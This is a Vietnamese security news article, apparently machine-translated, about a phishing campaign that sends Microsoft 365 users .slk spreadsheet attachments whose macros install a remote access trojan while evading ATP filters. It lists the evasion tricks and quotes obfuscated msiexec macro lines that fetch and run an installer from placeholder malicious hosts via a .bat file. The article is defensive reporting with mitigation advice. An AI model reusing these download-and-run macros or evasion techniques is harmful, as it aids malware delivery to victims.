Tin tặc sử dụng một phương pháp tấn công mới vượt qua cả bảo mật mặc định của Microsoft 365 (EOP) và bảo mật nâng cao (ATP).
Chiến dịch tấn công được thiết kế đặc biệt để vượt qua Microsoft 365 sử dụng tệp đính kèm .slk độc hại có chứa macro được nhúng để tải xuống và cài đặt trojan truy cập từ xa.
Cuộc tấn công đã được phát hiện bởi các nhà phân tích bảo mật của Avanan, theo các nhà phân tích “Tại thời điểm viết bài, Microsoft 365 vẫn còn dễ bị tấn công và cuộc tấn công vẫn đang được sử dụng rộng rãi chống lại các khách hàng của Microsoft 365.”
Khách hàng của Microsoft 365 được nhắm mục tiêu
“Liên kết tượng trưng” (SLK) là một định dạng bảng tính dựa trên văn bản, nó là một định dạng tệp thay thế cho XLSX. Rất hiếm người nhận được các tệp SLK.
Nếu bạn có các tệp nhận được trong hộp thư đến của mình, thì có khả năng bạn đang bị nhắm mục tiêu bởi phần mềm độc hại Trojan Truy cập Từ xa đã nâng cấp để vượt qua Bảo vệ Đe dọa Nâng cao.
“Cuộc tấn công nhắm mục tiêu cụ thể đến các tài khoản Microsoft 365 và cho đến gần đây, đã bị cô lập với một số ít tổ chức,” Avanan đọc báo cáo.
Những kẻ tấn công sử dụng các email được tùy chỉnh cao để tấn công mục tiêu của họ, chúng được tùy chỉnh cao và sử dụng chủ đề phù hợp nhất với tổ chức và cá nhân được nhắm mục tiêu.
Đây là mail mẫu có kèm theo file SLK
Sau đây là các kỹ thuật xáo trộn được sử dụng để bỏ qua ATP
- Cuộc tấn công được gửi từ hàng trăm tài khoản Hotmail miễn phí
- Tập lệnh macro bao gồm các ký tự '^' để gây nhầm lẫn cho các bộ lọc ATP.
- URL được chia làm hai để ATP không đọc nó như một liên kết web,
- Máy chủ lưu trữ đã hoạt động sau khi email được gửi đi nên nó có vẻ lành tính nếu được ATP đóng hộp cát,
- Máy chủ lưu trữ chỉ phản hồi các tác nhân người dùng “Windows Installer”, bỏ qua các truy vấn khác.
Các email được phát hiện được gửi từ hàng nghìn địa chỉ email Hotmail, những kẻ tấn công sử dụng nó như một lợi thế để vượt qua các bộ lọc bảo mật.
Tập lệnh macro cũng bao gồm các ký tự thoát để làm nhầm lẫn các bộ lọc ATP
M ^ s ^ tức là ^ xec /ih^tt^p^:^/^/malicious-site.com/install.php ^ / q
Cũng để gây nhầm lẫn cho ATP, những kẻ tấn công đã chia URL thành hai macro
Macro đầu tiên
set / p = ”” M ^ s ^ ie ^ xec / ih ^ tt ^ p ^: ^ / ^ / evil-sit ””> JBfoT.bat
Macro thứ hai
thiết lập /p=[$e.com/install.php ^ / q ”” >> JBfoT.bat & JBfoT.bat
Tệp SLK độc hại chạy hai để tạo một tập lệnh cài đặt độc hại cài đặt phần mềm dựa trên các lệnh do kẻ tấn công cung cấp.
Giảm nhẹ
Người dùng được khuyến nghị định cấu hình tài khoản Office 365 của bạn để từ chối tệp SLK tệp vì chúng tương đối hiếm.
Bạn có thể theo dõi chúng tôi trên Linkedin, Twitter, Facebook để bảo mật mạng hàng ngày và cập nhật tin tức về hack.
Cũng đọc
Nguồn: https://gbhackers.com/microsoft-365-customers-targeted/
